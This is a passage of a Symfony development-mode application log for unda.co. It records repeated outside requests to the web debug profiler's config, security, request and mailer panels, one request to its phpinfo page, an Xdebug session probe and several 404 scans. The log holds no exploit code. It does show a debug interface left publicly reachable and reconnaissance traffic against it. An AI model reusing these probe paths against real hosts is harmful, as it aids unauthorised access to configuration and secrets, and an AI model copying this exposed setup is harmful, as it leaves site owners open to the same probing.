  2023. [2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2024. [2025-12-17 04:46:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=time","method":"GET"} []
  2025. [2025-12-17 04:46:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2026. [2025-12-17 04:49:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2027. [2025-12-17 04:52:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=security","method":"GET"} []
  2028. [2025-12-17 04:52:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2029. [2025-12-17 04:53:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8252d7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8252d7","method":"GET"} []
  2030. [2025-12-17 04:53:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2031. [2025-12-17 04:58:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=request","method":"GET"} []
  2032. [2025-12-17 04:58:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2033. [2025-12-17 05:00:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
  2034. [2025-12-17 05:00:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2035. [2025-12-17 05:05:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=config","method":"GET"} []
  2036. [2025-12-17 05:05:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2037. [2025-12-17 05:05:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2038. [2025-12-17 05:08:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  2039. [2025-12-17 05:08:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  2040. [2025-12-17 05:11:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=cache","method":"GET"} []
  2041. [2025-12-17 05:11:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2042. [2025-12-17 05:11:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2043. [2025-12-17 05:11:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2044. [2025-12-17 05:11:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2045. [2025-12-17 05:11:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2046. [2025-12-17 05:11:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2047. [2025-12-17 05:11:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2048. [2025-12-17 05:11:51] security.DEBUG: Calling Authentication entry point. [] []
  2049. [2025-12-17 05:12:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
  2050. [2025-12-17 05:12:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  2051. [2025-12-17 05:12:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2052. [2025-12-17 05:12:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2053. [2025-12-17 05:12:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2054. [2025-12-17 05:12:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2055. [2025-12-17 05:12:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2056. [2025-12-17 05:12:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2057. [2025-12-17 05:12:52] security.DEBUG: Calling Authentication entry point. [] []
  2058. [2025-12-17 05:18:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2059. [2025-12-17 05:19:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3","method":"GET"} []
  2060. [2025-12-17 05:19:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2061. [2025-12-17 05:24:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
  2062. [2025-12-17 05:24:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  2063. [2025-12-17 05:27:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=twig","method":"GET"} []
  2064. [2025-12-17 05:27:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2065. [2025-12-17 05:28:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  2066. [2025-12-17 05:28:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  2067. [2025-12-17 05:29:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=cache","method":"GET"} []
  2068. [2025-12-17 05:29:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2069. [2025-12-17 05:30:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2070. [2025-12-17 05:34:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6b7869","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6b7869?panel=request","method":"GET"} []
  2071. [2025-12-17 05:34:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2072. [2025-12-17 05:34:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=time","method":"GET"} []
  2073. [2025-12-17 05:34:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2074. [2025-12-17 05:41:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=request","method":"GET"} []
  2075. [2025-12-17 05:41:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2076. [2025-12-17 05:49:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=security","method":"GET"} []
  2077. [2025-12-17 05:49:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2078. [2025-12-17 05:54:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2079. [2025-12-17 05:56:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=config","method":"GET"} []
  2080. [2025-12-17 05:56:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2081. [2025-12-17 05:57:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3bdca","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3bdca","method":"GET"} []
  2082. [2025-12-17 05:57:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2083. [2025-12-17 06:00:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=swiftmailer","method":"GET"} []
  2084. [2025-12-17 06:00:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  2085. [2025-12-17 06:01:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=security","method":"GET"} []
  2086. [2025-12-17 06:01:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2087. [2025-12-17 06:03:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=twig","method":"GET"} []
  2088. [2025-12-17 06:03:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2089. [2025-12-17 06:03:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2090. [2025-12-17 06:07:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2091. [2025-12-17 06:08:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2092. [2025-12-17 06:09:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=time","method":"GET"} []
  2093. [2025-12-17 06:09:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2094. [2025-12-17 06:10:40] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"adab63","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/adab63/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2095. [2025-12-17 06:10:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2096. [2025-12-17 06:15:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8eafba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8eafba","method":"GET"} []
  2097. [2025-12-17 06:15:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2098. [2025-12-17 06:16:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=security","method":"GET"} []
  2099. [2025-12-17 06:16:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2100. [2025-12-17 06:18:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
  2101. [2025-12-17 06:19:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"758c80","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/758c80?panel=config","method":"GET"} []
  2102. [2025-12-17 06:19:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2103. [2025-12-17 06:19:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  2104. [2025-12-17 06:21:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  2105. [2025-12-17 06:21:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2106. [2025-12-17 06:21:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"585d47","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/585d47?panel=logger","method":"GET"} []
  2107. [2025-12-17 06:21:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2108. [2025-12-17 06:23:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=request","method":"GET"} []
  2109. [2025-12-17 06:23:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2110. [2025-12-17 06:29:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=config","method":"GET"} []
  2111. [2025-12-17 06:29:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2112. [2025-12-17 06:34:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2113. [2025-12-17 06:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=security","method":"GET"} []
  2114. [2025-12-17 06:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2115. [2025-12-17 06:36:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=cache","method":"GET"} []
  2116. [2025-12-17 06:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2117. [2025-12-17 06:36:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2118. [2025-12-17 06:37:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e619","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e619?panel=events","method":"GET"} []
  2119. [2025-12-17 06:37:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2120. [2025-12-17 06:42:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c","method":"GET"} []
  2121. [2025-12-17 06:42:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2122. [2025-12-17 06:46:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
  2123. [2025-12-17 06:46:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
  2124. [2025-12-17 06:49:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=cache","method":"GET"} []
  2125. [2025-12-17 06:49:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
